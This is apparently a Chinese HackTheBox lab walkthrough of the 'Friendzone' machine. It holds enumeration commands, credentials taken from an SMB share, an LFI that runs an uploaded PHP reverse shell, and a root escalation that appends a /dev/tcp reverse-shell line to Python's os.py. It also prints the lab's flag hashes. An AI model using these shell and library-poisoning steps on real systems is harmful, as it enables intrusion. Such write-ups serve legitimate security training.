freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Easy] Friendzone LFI+Python-OS库污染权限提升
[Meachines] [Easy] Friendzone LFI+Python-OS库污染权限提升
maptnh 2024-07-29 20:24:15 37326

信息收集

IP AddressOpening Ports
10.10.10.123TCP:21,22,53,80,139,443,445

$ nmap -p- 10.10.10.123 --min-rate 1000 -sC -sV

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

SMB

image.png
$ enum4linux 10.10.10.123

image-1.png

$ dig axfr friendzone.red @10.10.10.123

image-4.png

$ smbclient //10.10.10.123/general

smb: \> get creds.txt

image-2.png

username:admin
password:WORKWORKHhallelujah@#

HTTPS

# echo '10.10.10.123 friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red '>>/etc/hosts

https://friendzone.red/

image-3.png

$ gobuster dir -u "https://administrator1.friendzone.red" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50 -k

image-5.png

LFI

username:admin
password:WORKWORKHhallelujah@#

https://administrator1.friendzone.red/login.php

image-6.png

image-7.png

https://administrator1.friendzone.red/dashboard.php

image-8.png

$ smbclient //10.10.10.123/Development

smb: \> put php-reverse-shell.php
smb: \> put pspy32

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

image-9.png

User.txt

ad2906258fb6679290609a6b243b6078

权限提升

$ cp /etc/Development/pspy32 /tmp

$ chmod +x /tmp/pspy32

$ /tmp/pspy32

image-11.png

$ cat /opt/server_admin/reporter.py

image-12.png

$ ls -la /usr/lib/python2.7/os.py

image-13.png

$ echo 'system("/bin/bash -c \"/bin/sh -i >& /dev/tcp/10.10.16.6/10033 0>&1\"")' >> /usr/lib/python2.7/os.py

image-14.png

Root.txt

253809a3fa48b78d59b7884199f37b35

# web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
相关推荐
[Meachines] [Easy] SwagShop Magento SQLI+Magento 反序列化RCE+vi权限提升 原创
[Meachines] [Easy] SwagShop Magento SQLI+Magento 反序列化RCE+vi权限提升

Web安全

#Magento SQLI #Magento 反序列化RCE #vi权限提升

maptnh

39845围观 2024-08-06

攻防演练 | ip溯源反制技战法
付费
攻防演练 | ip溯源反制技战法

攻防演练

常态化攻击IP溯源技战法的实施,为实现主动防御和实时防御策略奠定了坚实基础。

forgotten_007

109576围观  · 7收藏  · 29喜欢 2024-08-06

[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提升 原创
[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提升

Web安全

#Finger网络用户枚举 #Wget文件覆盖权限提升

maptnh

38802围观 2024-08-05

0Day漏洞技巧分享 | 同源打击 原创
付费
0Day漏洞技巧分享 | 同源打击

Web安全

何为同源打击? 小雷来为你揭秘

0x1eeA

109638围观  · 14收藏  · 91喜欢 2024-08-04

[Meachines] [Easy] shocker CGI-BIN Shell Shock + Perl权限提升 原创
[Meachines] [Easy] shocker CGI-BIN Shell Shock + Perl权限提升

Web安全

#Apache #CGI-BIN Shell Shock #Perl权限提升

maptnh

48018围观 2024-08-04

maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 344 文章数
  • 64 关注者
[CISSP] [9] 安全漏洞,威胁和对策
2025-04-09
[CISSP] [8] 安全模型,设计和能力的原则
2025-04-09
[CISSP] [7] PKI和密码应用
2025-04-03
文章目录
SMB
    HTTPS
      LFI
        User.txt
          Root.txt